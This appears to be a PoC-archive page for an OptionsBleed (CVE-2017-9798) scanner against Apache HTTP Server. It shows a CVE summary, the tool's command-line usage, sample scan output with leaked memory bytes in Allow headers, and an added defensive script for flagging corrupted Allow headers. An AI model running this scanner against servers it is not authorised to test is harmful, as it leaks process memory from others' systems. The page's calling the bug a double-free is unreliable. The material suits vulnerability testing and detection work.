Related vulnerability
Title:
Apache HTTP Server resource management error vulnerability
(CVE-2017-9798)
Description: Apache HTTP Server is an open-source web server from the Apache Software Foundation (USA). The server is fast, reliable and extensible through a simple API. A double-free vulnerability exists in Apache HTTP Server 2.2.34 and earlier and in 2.4.x through 2.4.27. An attacker can exploit this vulnerability by sending unauthenticated OPTIONS HTTP requests to read data from process memory.
Description
OptionsBleed (CVE-2017-9798) PoC / Scanner
Introduction
# OptionsBleed-POC-Scanner
OptionsBleed (CVE-2017-9798) PoC / Scanner
More information coming soon...
## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
## Usage
`pip install -r requirements.txt`
```
usage: bleeder.py [-h] [-c COUNT] [-f {option,custom}] [-tc THREAD_COUNT] [-nv] [-ni] [-v] [-e] url

positional arguments:
  url                   full URL (including http(s)) to be scanned

optional arguments:
  -h, --help            show this help message and exit
  -c COUNT, --count COUNT
                        number of times to scan (default: 1000)
  -f {option,custom}, --force {option,custom}
                        forces the scan to attempt using custom verb method
                        OR OPTIONS (default: try OPTIONS THEN custom)
  -tc THREAD_COUNT, --thread-count THREAD_COUNT
                        max concurrent thread count (default: 500)
  -nv, --no-verify      does not verify ssl connection (may be necessary for
                        self-signed certs)
  -ni, --no-ignore      does NOT ignore ssl warnings (default: ignored)
  -v, --verbose         prints all headers
  -e, --errors          prints all errors
```
## Simple Usage
```console
python bleeder.py "http://10.1.2.3" -c 50
::OptionsBleed (CVE-2017-9798) Scanner::
[+] scanning http://10.1.2.3 to see if it bleeds!
[+] checking OPTION method
[+] allow headers detected in OPTION response
[+] checking CUSTOM method
[+] allow headers detected in CUSTOM response
[+] scanning with OPTIONS method...
[+] scanning with custom (PULL) method...
[+] 50 responses captured
[+] unique results:
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
[+] scan complete!
```
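The "unique results" above are raw `Allow` header values, and the sign of a leaking server is that some of them are not well-formed method lists: empty elements, repeated methods, lowercase fragments such as `allow`/`all`, or bytes that are not valid HTTP token characters at all. The following Python is an added example, not part of the bleeder.py project, for triaging such captured header values (for instance from a scan log or from a reverse proxy's access log that records upstream `Allow` headers). It assumes nothing about the scanner; the sample values are constructed to resemble the output shown above, and the lowercase check is a heuristic that may flag legitimately lowercase custom methods.

```python
import re
from typing import Dict, List

# HTTP "token" characters (RFC 7230 section 3.2.6). Every method name in a
# well-formed Allow header must consist only of these characters.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_allow(value: str) -> List[str]:
    """Split an Allow header value on commas. Empty elements are kept on
    purpose: a trailing or doubled comma is itself a sign of corruption."""
    return [part.strip() for part in value.split(",")]


def allow_header_anomalies(value: str) -> List[str]:
    """Return the reasons an Allow value looks corrupted.

    An empty list means the header is a clean, de-duplicated list of
    token-shaped method names.
    """
    reasons: List[str] = []
    tokens = parse_allow(value)

    if any(t == "" for t in tokens):
        reasons.append("empty element")

    # Bytes outside the token alphabet (e.g. non-ASCII garbage) can never
    # be part of a legitimate method name.
    bad = [t for t in tokens if t and not TOKEN_RE.match(t)]
    if bad:
        reasons.append("non-token characters: %r" % bad)

    # Heuristic: standard and most custom methods are uppercase; lowercase
    # fragments like "allow"/"all" look like pieces of another string.
    lower = [t for t in tokens if t and t != t.upper()]
    if lower:
        reasons.append("lowercase tokens: %r" % lower)

    seen, dups = set(), []
    for t in tokens:
        if t and t in seen and t not in dups:
            dups.append(t)
        seen.add(t)
    if dups:
        reasons.append("duplicated methods: %r" % dups)

    return reasons


def triage(values: List[str]) -> Dict[str, List[str]]:
    """Map each distinct anomalous Allow value to the reasons it was flagged."""
    flagged: Dict[str, List[str]] = {}
    for value in values:
        reasons = allow_header_anomalies(value)
        if reasons and value not in flagged:
            flagged[value] = reasons
    return flagged


# Constructed sample values modelled on the scanner output above; they are
# not captured from any real host.
SAMPLE_ALLOW_VALUES = [
    "GET,HEAD,POST,OPTIONS",  # clean response
    "GET,HEAD,POST,OPTIONS",  # repeated clean response
    "GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,",
    "GET,HEAD,\u255aj\u03c6HU,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,",
    "GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD",
]


if __name__ == "__main__":
    for value, reasons in triage(SAMPLE_ALLOW_VALUES).items():
        print("%r -> %s" % (value, "; ".join(reasons)))
```

A server whose every `Allow` response passes `allow_header_anomalies` with an empty list across many requests is behaving as expected; a single flagged value is worth checking against the affected version range given at the top of this page.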
File snapshot
[4.0K] /data/pocs/0b653157ac9542953820a1d50a1c0f64c5f61dc2
├── [4.5K] bleeder.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
Notes
1. We recommend accessing the code through the original source first.
2. If the source has disappeared or cannot be reached, please email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of this PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.